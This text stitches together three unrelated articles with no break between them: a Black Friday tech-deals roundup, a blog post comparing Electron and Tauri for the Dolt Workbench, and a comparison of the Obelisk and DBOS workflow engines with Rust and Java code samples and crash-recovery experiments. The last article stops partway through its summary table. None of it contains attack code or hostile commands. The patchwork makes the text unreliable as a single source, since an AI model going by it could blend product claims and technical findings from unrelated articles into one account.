For this list of deals, I studied deal sites, forums and databases of deals to find deep discounts on products that I know and love. I’ve personally used many of the items in this roundup, held them up in my hand, used them daily in my life, and in many cases, written reviews of them. And in the cases where I haven’t, I know the companies and product space enough to feel confident making recommendations. While plenty of these gadgets would make great gifts, you’ll also find plenty of opportunities to upgrade your own home, if you’re so inclined.
Here are some of the best deals I’ve been able to find so far. This list will be constantly updated through November, so make sure to check back.
This article was updated on 20 November with the latest prices and availability.
The very best Black Friday and Cyber Monday tech deals
Whether I’m reading or watching a movie, the Amazon Fire HD 10 tablet has a beautiful screen and just the right amount of power to stream content: you don’t need much computing muscle to turn pages of a book or play back a video. It’s also very durable, so it’s great for coffee table reading. While a Fire tablet isn’t as useful as a full Android tablet, at this price it’s still a great deal, even if it only ends up as your Netflix screen to go.
JBL is an iconic name in sound, and the JBL Live Pro 2 are some of my favorite earbuds. They have excellent Active Noise Cancellation (ANC), which makes it easier to listen to your music at a lower volume to avoid hearing damage. You also get excellent battery life, at up to 10 hours on a single charge, so these can be a great musical companion for the vibe-coders in your life to blot out the world for hours while they crack on the next big thing. I’d heartily recommend them at full price, so at half-off they’re a no brainer.
Smart cameras typically come with a big trade-off: you need to either run an ugly wire to them or change the battery every couple months. But the Blink Outdoor 4 Wireless camera sidesteps both with a battery that can last up to two years. I’ve had one for about a year so far, and the battery shows no signs of stopping. You can put this camera anywhere it has access to wifi and basically forget it exists, except when you want to see what’s going on in your yard. At 60% off, it’s worth grabbing a few for different parts of the house and yard.
The Amazon Fire TV Stick 4K plus remains the single easiest way to turn a regular TV into a smart TV. Just plug it into your TV and a power source, and just like that you have access to streaming services such as Netflix and Hulu, Amazon and Blink camera feeds, and of course Alexa. The ultra-simple remote makes for easy navigation, and has a built-in mic for voice commands (“Hey Alexa, play The Office.”) At 50% off, you can grab one for every TV in the house, or even one to travel with – it’s tiny.
Samsung’s latest smartwatch brings a ton of improvements to your wrist, including totally redesigned software that makes it easier to use. Like most smart watches, it can track your sleep and monitor your heart rate during exercise, but it also performs some unique feats like measuring antioxidants to help suggest dietary changes, and tracking blood-oxygen levels to flag potential health issues. It all comes wrapped in an attractive package that lasts for almost two days on a charge.
Amazon Fire HD 8 Tablet Plus Standing Cover Bundle
The Amazon Fire HD 8 is a slightly smaller version of the aforementioned Amazon Fire Tablet that’s better suited to travel. This particular bundle also includes a case with an origami-style leg to prop up the tablet up for watching shows on the go. Like the larger model, it’s mainly a media machine, so imagine it more like a portable TV than a full-fledged tablet. At this price, it’s still well worth it.
I review phones year-round, and this is the one I go back to when I’m not reviewing anything else. It’s simply one of the best Android smartphones. It has an amazing camera setup great for ultrawide snaps and zooming in to a crazy degree, onboard AI including Gemini Live, epic battery life (easily a day and a half), and a built-in stylus for those times you want precision in your tapping and swiping. This price tag may not seem like much of a discount since the S25 Ultra usually starts at about $1,200, but this is the upgraded model with 512GB storage, which you’re going to want.
Samsung’s “fan edition” (FE) devices are designed for buyers who want a flagship phone experience at a lower price point. That means the S25 FE phone has most of the same chops as its larger siblings, including all the same AI tricks, and an impressive triple-camera setup that’s no joke. It’s a great value even at full price, and at 27% off one of the best phone deals out there for Black Friday.
Bone-conduction headphones don’t go in your ears – they sit above the ear and transmit crisp, clear audio with a full range of tones by simply vibrating against your head. That means you can still hear everything going on around you, making them ideal for runners. But they’re great for non-runners too – like me! I use them often on bike rides.
Bose has been a leader in noise-cancelling headphones for decades, and the QuietComfort series carries on that legacy. These headphones are great for frequent travelers as they can cancel out the drone of planes, trains, or automobiles, while you enjoy the film Planes, Trains, and Automobiles. You don’t often see these headphones at this price, so these would be a great pickup.
If, like me, the traveler in your life doesn’t want to carry a bulky set of over-the-ear headphones, earbuds like these are a great solution. Like their bigger brothers, these offer outstanding active noise cancellation to drown out airplane noise, but they’re also compact and still have good battery life. Since they’re earbuds, they form a great seal in your ear canal, which passively seals out noise even when ANC isn’t active. At this price, these earbuds are hard to resist, especially when compared to their peers at $130.
A pair of black Sony WF-1000XM5 Earbuds
Photograph: Courtesy of Sony
Sony headphones are a cut above the rest in terms of sound quality: when I tested the WF-1000XM5, I heard tones in music that I had never heard before. I believe they’re the best-sounding earbuds you can buy, and the Guardian’s reviewer
loved them too
. Their popularity means Sony seldom needs to discount them, so 30% off is hard to ignore. If you know someone who loves music but still listens with cheap headphones, this will open a whole new world.
Of all the voice assistants I’ve used (all of them), Alexa is the best, providing fast, accurate answers and controlling your smart home devices just as quickly. You can check the weather, get the latest news, listen to podcasts and more with just your voice. While Google Assistant and Siri have stagnated, Alexa continues to evolve and improve: An AI-enabled version called Alexa+ just rolled out this year for Prime subscribers.
Lots of smart-home products are gimmicky, but we
wholeheartedly recommend smart bulbs
. You can have them turn on automatically at dusk, wake you up slowly in the morning as an alarm clock, or just answer to your voice commands. A multicolor bulb like this Kasa model also lets you set the mood with one of 16m colors. A two-pack for $15.99 is an instant upgrade to your home.
Photograph: Courtesy of Amazon
TP-Link Deco X15 Dual-Band AX1500 WiFi 6 Mesh Wi-Fi System
If you have wifi dead spots in your home, a mesh wifi network is an easy modern way to fix the issue. A mesh system uses multiple access points to blanket your home in signal, and automatically switches your devices to the closest one, so you’ll no longer drop Zoom calls when you walk into that one corner of your basement. This system comes with three points, which should be plenty for most homes, but you can easily add more.
Meta has been leading the way in the VR space for a decade, and the Meta Quest 3S is the most accessible headset on the market today. My favorite game is
Hell Horde
,
a first-person shooter in which demons come running at you through a hole in your living room wall. It’s wild, and there are games for all interests including
The Climb
,
Beat Saber
,
Star Wars: Beyond Victory
and more.
The HoverAir X1 is less of a drone and more of a flying camera that keeps you the center of its focus. It can fly preprogrammed routes to capture the scenery around you or follow you around, dodging obstacles along the way. When I tested this drone, I rode an electric bike for five miles under and around trees, and it kept up beautifully. It’s foldable and fits neatly in a jacket pocket.
Few flat-screen TVs come with sufficient built-in sound, and even if yours seems OK, a soundbar takes things to another level. This BRAVIA Theater Bar 6 comes with a separate subwoofer and two rear-channel speakers to fill your room with sound, and the rear channels are wireless for easier installation. Once you hear it, you will never want to watch TV again without it.
We live in an amazing time when you can buy a 75in 4K TV for under $400. This model even uses QLED technology for better color accuracy, which used to be a premium feature just a few years ago. Since it’s a Roku TV, all of your streaming services are at your fingertips right out of the box. This is a one-off model that appears to be exclusive to Walmart, so you won’t find reviews on it, but Hisense is a reputable brand and TVs have matured so much that even budget models hold their own to most eyeballs.
For color fidelity and contrast, most home theater enthusiasts still turn to OLED screens, but they seldom come cheap. This is a great deal on a high-end example, just one rung below Samsung’s flagship S95F. Gamers will appreciate the 144Hz refresh rate for smoother action, and the AI processor for 4K upscaling means that even older shows and movies will make use of every pixel.
The
Dolt Workbench
is an open-source SQL workbench supporting MySQL, Postgres,
Dolt
, and
Doltgres
databases. We built the workbench using
Electron
, which is a popular framework that allows you to convert web apps built with traditional web technologies like HTML, CSS, and JavaScript to desktop applications. Since the workbench shares much in common with
DoltHub
and
Hosted Dolt
, the architecture is very similar to those products. That is, the workbench uses
Next.js
for the frontend with an additional GraphQL layer that handles database interactions. For this reason, it made a lot of sense to use Electron to get the desktop version of our application up and running.
That said, Electron comes with a few rather significant drawbacks, and those drawbacks have started to become more apparent as the workbench has matured. Because of this, I spent some time exploring
Tauri
, a newer framework that supports the same web-to-desktop use case as Electron. In this article, we’ll discuss how well Electron and Tauri integrate with the workbench, and weigh some pros and cons between the two frameworks.
Next.js doesn’t translate very cleanly to a desktop application context. This is primarily due to the framework’s architecture around server-side rendering and API routing features. In a desktop app, there’s no application server interacting with a client; we just need to render HTML, CSS, and JavaScript in a window. For these reasons, Electron only loosely supports Next.js applications. That’s not to say you can’t build an Electron app with Next.js, but it requires some workarounds to make it function properly. One of the more popular workarounds is a project called
Nextron
, which aims to wire Next.js applications to the Electron framework and streamline the build process. This is the project we use for the workbench. The issue is that, at the time of writing, it appears that Nextron is no longer being maintained, and we started hitting a few bugs with it.
Tauri is largely frontend-framework agnostic. For Next, specifically, you still can’t use the server-side features, but Tauri makes the integration process much simpler by relying on Next’s static-site generation capabilities. To make a Next app work with Tauri, you just need to set
output: 'export'
in your Next configuration file, and Tauri handles the rest.
The biggest difference between Electron and Tauri comes from how they render the UI. The Electron framework comes with a full Chromium browser engine bundled in your application, which is the same engine that backs Google Chrome. This is useful because it means you don’t have to worry about browser compatibility issues. Regardless of the end user’s machine or architecture, the same Chromium instance renders your application UI. This results in a very standardized experience that ensures your app will look the same regardless of where it’s running. However, this also results in a fair amount of bloat. For the vast majority of desktop apps, a full Chromium browser engine is overkill. Even the simplest “Hello World” applications using Electron can run you up to 150 megabytes of disk space.
Tauri solves this problem by leveraging the system’s native webview. Instead of bundling a full browser engine, Tauri uses a library called
WRY
, which provides a cross-platform interface to the appropriate webview for the operating system. As you’d expect, this makes Tauri apps far more lightweight. The downside here is that you no longer have a hard guarantee on compatibility. From what I can tell, however, this mostly seems to be a non-issue. Compatibility issues across system webviews are exceedingly rare, especially for the major operating systems.
Another major difference between the two frameworks is how they handle the “main” process. This refers to the backend process that orchestrates the application windows, menus, and other components of a desktop app that require interaction with system APIs. In Electron, the main process runs in a Node.js environment. This means you get access to all the typical Node APIs, you can import things like normal, and, perhaps most importantly, you can write your Electron-specific code in pure JavaScript. This is a huge bonus for Electron’s target audience: web developers.
Tauri, on the other hand, uses Rust. All the framework code and the main process entrypoint are written in Rust. Obviously, this makes it a bit less accessible to the average web developer. That said, Tauri provides a fairly robust set of JavaScript APIs to interact with the Rust layer. For most applications, these APIs will be sufficient to do what you need to do. In the case of the workbench, I was able to fully replicate the functionality of the Electron version using the JavaScript APIs and some minimal Rust code.
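To give a feel for what that “minimal Rust code” pattern looks like, here is a hedged sketch (not the workbench’s actual code; the command name and behavior are invented for illustration) of a Tauri command that the frontend can call through Tauri’s JavaScript invoke API:

// Sketch of a Tauri command exposed to the frontend. `file_exists` is an
// invented example, not taken from the Dolt Workbench.
#[tauri::command]
fn file_exists(path: String) -> bool {
    std::path::Path::new(&path).exists()
}

fn main() {
    // Assumes a normal Tauri project scaffold (tauri.conf.json present).
    tauri::Builder::default()
        .invoke_handler(tauri::generate_handler![file_exists])
        .run(tauri::generate_context!())
        .expect("error while running tauri application");
}

On the JavaScript side the command is then reachable roughly via invoke('file_exists', { path }).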
In my experience, I found the Tauri APIs to fit more naturally in our application code. With Electron, if you need the main process to do something, you must always use inter-process communication, even for the simplest of tasks. If you want to write to a file on the host machine, for instance, your frontend needs to send a signal to the Electron main process, which will then spawn a new process and run the function you wrote that performs the write. With Tauri, you can just use Tauri’s filesystem API directly in your application code. Under the hood, the same sort of IPC pattern is happening, but I think the Tauri abstraction is a bit nicer.
Since Electron runs on Node.js, it also bundles a full Node.js runtime with your application. This comes with some pros and cons. For the workbench, specifically, this is beneficial because the GraphQL layer is itself a separate Node.js application that needs to run alongside the frontend. Since Electron ships with Node.js, this means we can directly spin up the GraphQL server from the Electron main process using the Node runtime. This eliminates a lot of the headache associated with bundling and running a typical sidecar process. For instance, our app also ships with a copy of Dolt, which allows users to start up local Dolt servers directly from the workbench. To make this work, we have to bundle the appropriate Dolt binary with each workbench release that corresponds to the correct architecture. Without the Node runtime, we’d have to do something similar for the GraphQL layer.
With Tauri, this is exactly the problem we run into. To get around it, we need to compile the GraphQL server into a binary using a tool like
pkg
, then run it as a sidecar the same way we run Dolt. Thankfully, this seems to be a fairly common use case for Tauri applications, and they have a useful guide on
how to run Node.js apps as a sidecar
.
It’s also worth mentioning that the full Node.js runtime is quite heavy, which also contributes to bloated Electron app sizes. After building the workbench using both Electron and Tauri, the difference in size was substantial. The left is the Electron version and the right is Tauri:
After replicating the workbench’s functionality in Tauri, we’re holding off on making the full transition for a couple reasons:
Lack of support for .appx and .msix bundles on Windows
- Currently, Tauri only supports .exe and .msi bundles on Windows. This means your Microsoft Store entry will only link to the unpacked application. The workbench is currently bundled and published using the .appx format. To address this, we would need to take down the workbench entirely from the Microsoft Store and create a new application that uses the .exe format.
Issues with macOS universal binaries
- This is more an annoyance than a bug, but I ran into a few issues related to codesigning universal binaries for macOS. Namely, Tauri doesn’t seem to be able to create Mac universal binaries from their arm64 and x64 subcomponents. It also seems to be codesigning the Mac builds twice.
Neither of these is a hard blocker, but they’re annoying enough that I’m holding off on migrating until they’re resolved or our issues with Nextron become more problematic. For now, I’m leaving
my branch with the migration
open and hope to revisit soon. If you’re on the Tauri team, let us know if you have solutions!
Overall, I’m impressed with Tauri. It eliminates much of the classic Electron bloat and integrates naturally with our existing codebase. If you’re curious about Tauri or the Dolt Workbench, let us know on
Discord
.
Obelisk and
DBOS
are both open-source
durable workflow engines.
Let's see how they compare in terms of ease of use, nondeterminism prevention and performance.
I will go through the
Learn DBOS Java
tutorial
and compare it with a Rust version of the same code written for Obelisk.
I chose Java because of familiarity; however, the library has just been released, so the code is still quite young.
On the Obelisk side, Rust is the obvious choice as it has the best
performance
and
tooling
.
Setting up the environment
DBOS-Java needs a JDK, Gradle and a PostgreSQL database.
For building WASM Components we need Rust and Cargo.
Intro into deterministic workflow engines
As both
Obelisk
and
DBOS
emphasize, workflows must be deterministic and activities / steps must be idempotent.
This ensures that long-running workflows
can continue after a server crash or when they are migrated from one machine to another.
Activities can be retried automatically on a failure, but even a successful activity might
be retried if the server crashes just before persisting the result.
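As a tiny illustration of the idempotency requirement (my own sketch, not part of either tutorial): creating a file with a fixed name can safely be retried, while appending to a log cannot, because a retry after a crash-before-persist would duplicate the line.

use std::fs::{File, OpenOptions};
use std::io::Write;

// Safe to retry: running it twice leaves the same end state.
fn idempotent_step(idx: u64) -> std::io::Result<()> {
    File::create(format!("file-{idx}.txt"))?;
    Ok(())
}

// Not safe to retry: every retry appends another line.
fn non_idempotent_step(idx: u64) -> std::io::Result<()> {
    let mut log = OpenOptions::new().create(true).append(true).open("log.txt")?;
    writeln!(log, "step {idx} ran")
}

fn main() -> std::io::Result<()> {
    idempotent_step(0)?;
    non_idempotent_step(0)
}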
Our test bed will be:
An idempotent activity (step in DBOS lingo) that interacts with the world: sleeps and creates a file
Serial and parallel workflows that run the activity, with a persistent sleep, in a loop
An HTTP endpoint (webhook endpoint in Obelisk lingo) that triggers these workflows.
Activity
package tutorial:activity;
interface activity-sleepy {
step: func(idx: u64, sleep-millis: u64) -> result<u64>;
}
world any {
export tutorial:activity/activity-sleepy;
}
use exports::tutorial::activity::activity_sleepy::Guest;
use std::time::Duration;
use wit_bindgen::generate;
generate!({ generate_all });
struct Component;
export!(Component);
impl Guest for Component {
fn step(idx: u64, sleep_millis: u64) -> Result<u64, ()> {
println!("Step {idx} started");
std::thread::sleep(Duration::from_millis(sleep_millis));
println!("Step {idx} creating file");
let path = format!("file-{idx}.txt");
std::fs::File::create(path)
.inspect_err(|err| eprintln!("{err:?}"))
.map_err(|_| ())?;
println!("Step {idx} completed");
Ok(idx)
}
}
Workflow
package tutorial:workflow;
interface workflow {
serial: func() -> result<u64>;
parallel: func() -> result<u64>;
}
world any {
export tutorial:workflow/workflow;
// Import of the activity.
import tutorial:activity/activity-sleepy;
// Generated extensions for `parallel` workflow.
import tutorial:activity-obelisk-ext/activity-sleepy;
// Obelisk SDK
import obelisk:types/execution@3.0.0;
import obelisk:workflow/workflow-support@3.0.0;
import obelisk:log/log@1.0.0;
}
use exports::tutorial::workflow::workflow::Guest;
use obelisk::{
log::log,
types::time::{Duration, ScheduleAt},
workflow::workflow_support::{self, ClosingStrategy, new_join_set_generated},
};
use std::collections::HashSet;
use tutorial::{
activity::activity_sleepy::step,
activity_obelisk_ext::activity_sleepy::{step_await_next, step_submit},
};
use wit_bindgen::generate;
mod util;
generate!({ generate_all });
struct Component;
export!(Component);
impl Guest for Component {
fn serial() -> Result<u64, ()> {
log::info("serial started");
let mut acc = 0;
for i in 0..10 {
log::info("Persistent sleep started");
workflow_support::sleep(ScheduleAt::In(Duration::Seconds(1)));
log::info("Persistent sleep finished");
let result = step(i, i * 200).inspect_err(|_| log::error("step timed out"))?;
acc += result;
log::info(&format!("step({i})={result}"));
}
log::info("serial completed");
Ok(acc)
}
#[allow(clippy::mutable_key_type)]
fn parallel() -> Result<u64, ()> {
log::info("parallel started");
let max_iterations = 10;
let mut handles = HashSet::new();
for i in 0..max_iterations {
let join_set = new_join_set_generated(ClosingStrategy::Complete);
step_submit(&join_set, i, i * 200);
handles.insert((i, join_set));
}
log::info("parallel submitted all child executions");
let mut acc = 0;
for (i, join_set) in handles {
let (_execution_id, result) =
step_await_next(&join_set).expect("every join set has 1 execution");
let result = result.inspect_err(|_| log::error("step timed out"))?;
acc = 10 * acc + result; // order-sensitive
log::info(&format!("step({i})={result}, acc={acc}"));
workflow_support::sleep(ScheduleAt::In(Duration::Milliseconds(300)));
}
log::info(&format!("parallel completed: {acc}"));
Ok(acc)
}
}
Webhook endpoint
package any:any;
world any {
import tutorial:workflow/workflow;
}
use crate::tutorial::workflow::workflow;
use anyhow::Result;
use wit_bindgen::generate;
use wstd::http::body::Body;
use wstd::http::{Error, Request, Response, StatusCode};
generate!({ generate_all });
#[wstd::http_server]
async fn main(request: Request<Body>) -> Result<Response<Body>, Error> {
let path = request.uri().path_and_query().unwrap().as_str();
let response = match path {
"/serial" => {
let acc = workflow::serial().unwrap();
Response::builder().body(Body::from(format!("serial workflow completed: {acc}")))
}
"/parallel" => {
let acc = workflow::parallel().unwrap();
Response::builder().body(Body::from(format!("parallel workflow completed: {acc}")))
}
_ => Response::builder()
.status(StatusCode::NOT_FOUND)
.body(Body::from("not found")),
}
.unwrap();
Ok(response)
}
Ergonomics
DBOS uses a callback approach when submitting child executions:
int result = DBOS.runStep(() -> step(i, 200 * i), "step " + i);
The drawback here is lower readability when orchestrating a large number of steps.
DBOS could use the Proxy pattern instead, but that would make it more difficult to attach metadata such as the step name, retry configuration, etc.
Obelisk workflows can call a child execution directly without a callback:
let result = step(i, i * 200).unwrap();
or using
Extension Functions
,
automatically generated from the activity's WIT file:
step_submit(&join_set, i, i * 200);
let (_execution_id, result) = step_await_next(&join_set).unwrap();
A great thing about DBOS is that everything fits into a single Java file.
However, the schema-first approach has several advantages:
Strong, explicit interface contracts
No way of forgetting to use the callback style or to construct a proxy object, which would lead to mixing side effects into workflows.
Cross-language interoperability: The WASM Component Model supports many languages such as
Rust, JavaScript, Python, Go and more.
Versioning and backward compatibility: Activities can export several versions of the same interface, enabling workflows to catch up at their own pace.
Codegen allows creating multiple variants of the same exported function, taking advantage of both the proxy and callback patterns without their drawbacks.
Experiments
Experiment A: Simulating a server crash
The task is to start the workflow, kill the server and start it again to see if the workflow finishes.
Submitting the parallel workflow in DBOS and then killing the server
revealed an unpleasant surprise: after the restart, the workflow ended in the
ERROR
state, with an error and a huge stack trace:
However, after I
reported
the bug, the PR was merged within 24 hours. Kudos to the DBOS team.
Other than that, the only notable issue I found was that DBOS recovery started after around a one-minute delay.
I was
instructed
to disable Conductor, a proprietary distributed orchestrator, which resolved the problem.
No problems with Obelisk were found.
Experiment B: Breaking determinism with code changes
Changing the code of a running workflow is a delicate process. It can only work when the change does not affect
the execution log, or when the running execution did not reach the changed line yet.
One clever trick that DBOS does is that it detects code changes by
hashing the bytecode
of workflow classes. Obviously this is a best-effort solution, as the change can come from a dependency, or from
using a nondeterministic construct, as discussed later.
Instead of extracting the workflow logic into another file, I have disabled the hashing by setting a constant application version.
Obelisk does not currently perform a hash digest of the workflow's WASM executable. In the future, it will
store the WASM hash
when an execution is created. Unlike DBOS's approach, this reliably reflects whether the code (including dependencies) has changed.
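To make the idea concrete, here is a rough sketch of content-addressing the deployed component (my assumption of the general approach, not Obelisk's code; the sha2 crate and the file name are placeholders): any change to the compiled code, including dependencies, produces a different digest.

use sha2::{Digest, Sha256};

// Hash the whole compiled component; "workflow.wasm" is a placeholder path.
fn wasm_digest(path: &str) -> std::io::Result<String> {
    let bytes = std::fs::read(path)?;
    let digest = Sha256::digest(&bytes);
    Ok(digest.iter().map(|b| format!("{b:02x}")).collect())
}

fn main() -> std::io::Result<()> {
    println!("{}", wasm_digest("workflow.wasm")?);
    Ok(())
}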
DBOS
should
throw an error when events produced on replay do not match the original execution log.
Let's start with an obvious change in the
serial
workflow:
public int serial() throws Exception {
...
- for (int i = 0; i < 10; i++) {
+ for (int i = 9; i >= 0; i--) {
// Note that the step name changed as well:
int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
fn serial() -> Result<(), ()> {
...
- for i in 0..10 {
+ for i in (0..10).rev() {
// Call the activity with different parameters
let result = step(i, i * 200).unwrap();
An in-progress execution that is replayed after a restart should detect this immediately, as the
i
variable
is used as a parameter to
step
invocation.
Both engines detect the failure:
Full error:
key does not match event stored at index 4:
key: ChildExecutionRequest(E_01KAJVHDX4VAPCPAXXZ2QCVWCZ.o:1_1.o:2-step_1, tutorial:activity/activity-sleepy.step, params: [9, 1800]),
event: JoinSetRequest(ChildExecutionRequest(E_01KAJVHDX4VAPCPAXXZ2QCVWCZ.o:1_1.o:2-step_1, tutorial:activity/activity-sleepy.step, params: [0, 0]))
Notice that the DBOS error only contains the naming differences,
step 0
vs
step 9
, whereas the Obelisk error contains the actual parameters.
In fact, if we are a bit lazy, and do not serialize parameters into the name properly:
- int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
+ int result = DBOS.runStep(() -> step(i2, 200 * i2), "step");
the workflow will finish happily with result 0+1+2+6+5+4+3+2+1+0=24!
Experiment C: Trimming execution events
Another interesting test is to lower the number of iterations.
Let's start a
serial
workflow, wait until around
step 8
, kill the server and change:
public void serial() throws Exception {
...
- for (int i = 0; i < 10; i++) {
+ for (int i = 0; i < 3; i++) {
...
int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
This kind of error can lead to resources like temporary VMs running without a cleanup and should be reported by the engine.
The latest version of Obelisk detects it correctly:
found unprocessed event stored at index 18: event: JoinSetCreate(o:7-sleep)
DBOS marks the trimmed execution as successful, returning 0+1+2=3.
Full disclosure: Obelisk 0.26.2 did not detect these changes correctly; the fixes landed in 0.27.0.
Experiment D: Breaking determinism using nondeterministic code
Instead of changing the code, determinism can be broken by using nondeterministic constructs.
DBOS documentation
warns
:
Java's threading and concurrency APIs are non-deterministic. You should use them only inside steps.
Using any source of nondeterminism, including the current date, IO, environment variables, RNG, or something more subtle like hash maps, will break the replay as well.
For posterity, let's replace the
ArrayList
/
Vec
with a hash set:
@Workflow(name = "parallel-parent")
public long parallelParent() throws Exception {
System.out.println("parallel-parent started");
- ArrayList<Map.Entry<Integer, WorkflowHandle<Integer, Exception>>> handles = new ArrayList<>();
+ HashSet<Map.Entry<Integer, WorkflowHandle<Integer, Exception>>> handles = new HashSet<>();
for (int i = 0; i < 10; i++) {
final int index = i;
var handle = DBOS.startWorkflow(
() -> this.proxy.childWorkflow(index),
new StartWorkflowOptions().withQueue(this.queue));
handles.add(new AbstractMap.SimpleEntry<>(i, handle)); // Tuple (i, handle)
}
System.out.println("parallel-parent submitted all parallel-child workflows");
long acc = 0;
for (var entry : handles) {
int result = entry.getValue().getResult();
acc = 10 * acc + result; // Order-sensitive
int i = entry.getKey();
System.out.printf("parallel-child(%d)=%d, acc:%d%n", i, result, acc);
DBOS.sleep(Duration.ofMillis(300));
}
System.out.println("parallel-parent completed");
return acc;
}
Crashing an in-progress workflow and replaying it in a new process:
parallel-parent started
parallel-parent submitted all parallel-child workflows
parallel-child(2)=2, acc:2
parallel-child(8)=6, acc:26
parallel-child(5)=8, acc:268
parallel-child(3)=5, acc:2685
parallel-child(4)=4, acc:26854
parallel-child(7)=9, acc:268549
parallel-child(1)=7, acc:2685497
parallel-child(9)=0, acc:26854970
# replayed up to this point
parallel-child(0)=0, acc:268549700
parallel-child(6)=6, acc:2685497006
parallel-parent completed: 2685497006
Notice something off?
parallel-child(n)
should always return
n
, and the final
acc
should contain every digit exactly once.
However, the ordering of
HashSet
iteration depends on each object’s memory address or a per-run JVM-specific identity value.
This is an obvious source of nondeterminism, and in this case leads to replaying wrong return values, exactly as in Experiment B.
The best DBOS could do here is to throw a nondeterminism detected error.
Applying the same change in Obelisk:
fn parallel() -> Result<u64, ()> {
log::info("parallel started");
let max_iterations = 10;
- let mut handles = Vec::new();
+ let mut handles = HashSet::new();
for i in 0..max_iterations {
let join_set = new_join_set_generated(ClosingStrategy::Complete);
step_submit(&join_set, i, i * 200);
handles.insert((i, join_set));
}
log::info("parallel submitted all child executions");
let mut acc = 0;
for (i, join_set) in handles {
let (_execution_id, result) =
step_await_next(&join_set).expect("every join set has 1 execution");
let result = result.inspect_err(|_| log::error("step timed out"))?;
acc = 10 * acc + result; // order-sensitive
log::info(&format!("step({i})={result}, acc={acc}"));
workflow_support::sleep(ScheduleAt::In(Duration::Milliseconds(300)));
}
log::info(&format!("parallel completed: {acc}"));
Ok(acc)
}
I have crashed an execution twice, but its output is stable:
I am not aware of any way to inject nondeterminism into the code:
accessing IO, sources of randomness, spawning a thread, etc., are all forbidden
and lead to a WASM trap (a non-recoverable runtime fault).
Even if there was a way to bypass the WASM sandbox, it would only lead to the
same result as we saw earlier with code changes - a nondeterminism detected error.
This experiment shows that, without a properly isolated environment, code that
works fine on the first run can be utterly broken on replay.
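For contrast, here is a tiny standalone native-Rust program (nothing to do with Obelisk's runtime) showing why a HashSet is a replay hazard outside a deterministic sandbox: std seeds its hasher with per-process randomness, so running the binary twice usually prints two different orders.

use std::collections::HashSet;

fn main() {
    let set: HashSet<u64> = (0..10).collect();
    // The same ten elements, but the iteration order depends on the
    // per-process hasher seed, so it typically changes from run to run.
    let order: Vec<u64> = set.iter().copied().collect();
    println!("{order:?}");
}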
Experiment E: Resource usage with 10k or 100k workflows
One of the main selling points of workflow engines is that workflows can durably sleep for weeks or more.
Let's model the situation where a main workflow spawns
one child workflow for every customer. This child workflow will just sleep for 1 day in order
to drive some business logic.
@Workflow
public void sleepyWorkflow(int idx) {
System.out.printf("%d%n", idx);
DBOS.sleep(Duration.ofDays(1));
// do some logic here
}
// Test submitting many customer workflows
@Workflow
public void sleepyParent(int max) {
var handles = new ArrayList<WorkflowHandle<Void, RuntimeException>>();
for (int i = 0; i < max; i++) {
final int index = i;
System.out.printf("Submitting child workflow %d%n", i);
var handle = DBOS.startWorkflow(
() -> this.proxy.sleepyWorkflow(index),
new StartWorkflowOptions().withQueue(this.queue));
handles.add(handle);
}
System.out.printf("Created %s child workflows%n", max);
int counter = 0;
for (var handle : handles) {
handle.getResult();
counter++;
System.out.printf("Collected %d child workflows%n", counter);
}
System.out.printf("Done waiting for %d child workflows%n", max);
}
When executing the parent workflow submitting 10k child workflows (on a machine with 16GB of RAM), the JVM process kept slowing down until it reached
a breaking point. After a few minutes, with the parent workflow reporting index 8602,
the process RSS had grown from ~130MB to 1.3GB;
it reported an OOM error and made no further progress.
Even after a restart, the same thing happened:
[172,701s][warning][os,thread] Failed to start thread "Unknown thread" - pthread_create failed (EAGAIN) for attributes: stacksize: 1024k, guardsize: 0k, detached.
[172,701s][warning][os,thread] Failed to start the native thread for java.lang.Thread "pool-1-thread-18613"
Exception in thread "QueuesPollThread" java.lang.OutOfMemoryError: unable to create native thread: possibly out of memory or process/resource limits reached
This could be mitigated by changing the limits on the OS level, but using one thread for each inactive workflow execution seems excessive.
fn sleepy_parent(max: u64) -> Result<(), ()> {
let join_set = &new_join_set_generated(ClosingStrategy::Complete);
for idx in 0..max {
log::info(&format!("Submitting child workflow {idx}"));
sleepy_workflow_submit(join_set, idx);
}
log::info(&format!("Created {max} child workflows"));
for counter in 0..max {
let (_execution_id, _result) = sleepy_workflow_await_next(join_set).unwrap();
log::debug(&format!("Collected {counter} child workflows"));
}
log::info(&format!("Done waiting for {max} child workflows"));
Ok(())
}
To make it a bit more challenging let's use
100k
child workflows.
Although Obelisk is not yet hardened for such scale, it managed to start all child workflows with RSS under 500MB.
Part of the reason is that, instead of using native threads, each execution lives inside a lightweight
Tokio
task.
Inactive workflows are automatically unloaded from memory after a configurable time, which keeps the
memory footprint low.
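As a rough illustration of why this scales (a generic Tokio sketch, not Obelisk's internals): 100k concurrent sleeping tasks are just small state machines multiplexed over a few OS threads, instead of 100k native threads each carrying its own stack.

use std::time::Duration;

// Requires the tokio crate with the "rt-multi-thread", "macros" and "time" features.
#[tokio::main]
async fn main() {
    let mut handles = Vec::with_capacity(100_000);
    for idx in 0..100_000u64 {
        handles.push(tokio::spawn(async move {
            tokio::time::sleep(Duration::from_secs(1)).await;
            idx
        }));
    }
    for handle in handles {
        handle.await.unwrap();
    }
    println!("all 100k tasks completed");
}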
Conclusion
Differences between DBOS and Obelisk can be summarized in a table.
Compared Language
DBOS: Java (other languages — Python, TypeScript, Go — are supported through their respective SDKs).
Obelisk: Rust (other languages supporting WASM Components: JavaScript, Python, Go).

Workflow Definition
DBOS: Code-first. Workflows and steps can reside in a single Java class.
Obelisk: Schema-first. Uses the WIT (WebAssembly Interface Type) IDL to define contracts between components.

Ergonomics
DBOS: Uses a callback approach for steps (e.g., DBOS.runStep(...)), which can lower readability.
Obelisk: Supports direct function calls or generated extension functions, offering cleaner syntax (e.g., step(...)).

Determinism Enforcement
DBOS: Manual/cooperative. Developers must avoid Java's non-deterministic APIs (threading, IO). Constructs like HashSet can break replay.
Obelisk: Strict/sandboxed. The WASM sandbox prevents access to non-deterministic resources (IO, RNG). HashSet iteration is stable.

Code Change Detection
DBOS: Best-effort. Hashes the bytecode of a class, but not the entire codebase. Failed to detect parameter changes if step names did not encode them; marked trimmed workflows as successful.
Obelisk: Strict. Reliably detects parameter mismatches and unprocessed events (e.g., trimmed events) on replay. Currently does not hash WASM files.

Execution Model
DBOS: Thread-based. Uses native threads for workflow executions.
Obelisk: Async/task-based. Uses lightweight Tokio tasks.

Scalability & Resource Usage
DBOS: Lower scalability. Failed at 10k concurrent workflows (OOM, 1.3GB RSS) due to thread exhaustion.
